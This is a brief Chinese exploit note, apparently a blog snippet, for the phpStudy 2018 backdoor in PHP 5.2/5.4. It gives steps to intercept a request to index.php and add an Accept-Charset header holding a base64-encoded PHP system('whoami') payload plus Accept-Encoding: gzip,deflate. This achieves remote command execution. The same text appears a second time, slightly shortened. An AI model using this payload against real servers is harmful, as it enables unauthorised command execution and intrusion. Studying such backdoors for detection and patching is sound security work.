搭建環境:
phpstudy2018
php版本5.4
漏洞影響版本:5.2/5.4
漏洞利用
1、隨便訪問一個存在的php文件 我這裏就訪問index.php好了
2、進行index.php 進行抓包 再自行添加兩個字段payload 執行系統命令
Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
Accept-Encoding: gzip,deflate
phpstudy2018
php版本5.4
漏洞影響版本:5.2/5.4
1、隨便訪問一個存在的php文件 我這裏就訪問index.php好了
2、進行index.php 進行抓包 再自行添加兩個字段payload 執行系統命令
Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
Accept-Encoding: gzip,deflate